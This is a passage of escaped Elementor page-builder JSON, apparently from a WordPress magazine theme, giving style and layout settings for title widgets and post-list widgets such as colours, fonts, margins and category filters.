TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"\",\"category\":[\"10\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_1\":\"on\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"on\",\"post_view_color_post_list_1\":\"#ffffff\",\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight\":\"600\",\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"use_category_post_list_1\":\"on\",\"typhography_category_post_list_1_color\":\"#ffffff\",\"post_list1_category_title_hov_color\":\"#ffffff\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight\":\"600\",\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"use_title_post_list_1\":\"on\",\"typhography_title_post_list_1_color\":\"#000000\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"600\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_meta_post_list_1\":\"on\",\"typhography_meta_text_post_list_1_color\":\"#999999\",\"typhography_meta_post_list_1_color\":\"#000000\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight\":\"600\",\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"on\",\"typhography_excerpt_post_list_1_color\":\"#777777\",\"post_list_1_excerpt_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"typhography_read_more_post_list_1_color\":\"#000000\",\"post_list1_read_more_title_hov_color\":\"#111111\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight\":\"400\",\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"typhography_read_more_border_post_list_1_color\":\"#000000\",\"post_list1_read_more_border_hov_color\":\"#111111\",\"section_magzma_post_list_1_column_control\":\"\",\"post_list1_margin_bottom\":\"20\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"1t9e6tv\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"MUSIC\",\"title_size\":\"h4\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#ea7441\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_1\":\"on\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"on\",\"post_view_color_post_list_1\":\"#ffffff\",\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight\":\"600\",\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"use_category_post_list_1\":\"on\",\"typhography_category_post_list_1_color\":\"#ffffff\",\"post_list1_category_title_hov_color\":\"#ffffff\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight\":\"600\",\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"use_title_post_list_1\":\"on\",\"typhography_title_post_list_1_color\":\"#000000\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_meta_post_list_1\":\"\",\"typhography_meta_text_post_list_1_color\":\"#999999\",\"typhography_meta_post_list_1_color\":\"#000000\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight\":\"600\",\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"typhography_excerpt_post_list_1_color\":\"#777777\",\"post_list_1_excerpt_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"typhography_read_more_post_list_1_color\":\"#000000\",\"post_list1_read_more_title_hov_color\":\"#111111\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight\":\"400\",\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"typhography_read_more_border_post_list_1_color\":\"#000000\",\"post_list1_read_more_border_hov_color\":\"#111111\",\"section_magzma_post_list_1_column_control\":\"\",\"post_list1_margin_bottom\":\"20\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false}